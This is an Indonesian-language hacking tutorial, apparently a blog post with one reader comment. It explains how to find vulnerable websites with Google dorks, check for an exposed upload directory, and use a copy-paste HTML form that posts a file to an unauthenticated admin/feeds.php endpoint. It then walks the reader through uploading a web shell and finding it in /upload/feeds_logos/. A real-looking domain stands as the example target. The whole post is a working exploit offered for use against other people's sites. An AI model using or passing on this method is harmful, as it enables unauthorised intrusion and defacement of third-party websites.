Langsung aja Ga Usah Banyak CinCoeg :)))
Dork :
- inurl:"/feed-sources"
- inurl:"/top-hits-items"
Exploit : /upload/feeds_logos/
Langkah2 nya Nih Baca Yang Bener yah :v
Cari Target Dengan Dork Tadi Di atas ~ Kalau Sudah Terus Kasih Exploit ini /upload/feeds_logos/ :D
Contoh : www.galih-miftah-sani.or.id/upload/feeds_logos/
Kalau Keluar Directorya Berarti itu Vuln :D
Nah Sekarang Buka Notepad Terus Copy Paste Kode Berikut, Simpen Dengan Format .html yah :))
<html> <title>Mr. DellatioNx196 | Indonesian Cyber Freedom</title> <center> # dork : inurl:"/feed-sources" inurl:"/top-hits-items"<br> # exploit :Test exploit --> /upload/feeds_logos/<br><br> <form action="http://www.galih-miftah-sani.or.id/admin/feeds.php?do=edit&id=1" method="post" enctype="multipart/form-data"> <label for="file">File :</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="Submit"> </form>
Tulisan Yang Berwarna Merah Diganti Dengan Target yang tadi Sudah Kamu Dapatkan :)
Kalau Dah di Save ~ Buka File nya Lewat Browser apa aja dah :v
Terus Muncul Uploader ~ Lalu Upload SHELL Kalian :D
Nah Kalau Sudah Selesai Biasanya Kalau Berhasil Ngupload Langsung Ke Redict ke Login Adminnya :D
Kalau Keredict ke Halaman Login Adminnya Tinggal Check Lokasi Shell Kita woakwakok :v
Ehh Inget ya Shell Kita namanya jadi acak2 an loe >.< woakwoka Gampang Kalau Mau Manggil Shell Mah Tinggal Chek DiRectory nya aja di ~
Contoh : www.galih-miftah-sani.or.id/upload/feeds_logos/
Tar Muncul File ~ Lo Cari Aja Yang Format File nya Ber Ekstensikan .php Lalu di Klik :D
Taraa :v Kalau Muncul Shell Loe Berarti Berhasil :D Kalau gak Ya itu Si Factor Face woakwoak :v
Oke Sekian Dulu Tutorial Ngawur dari Ane Semoga Bermamfaat yah :))
Kak SS Dirctorinya Dong :3
BalasHapus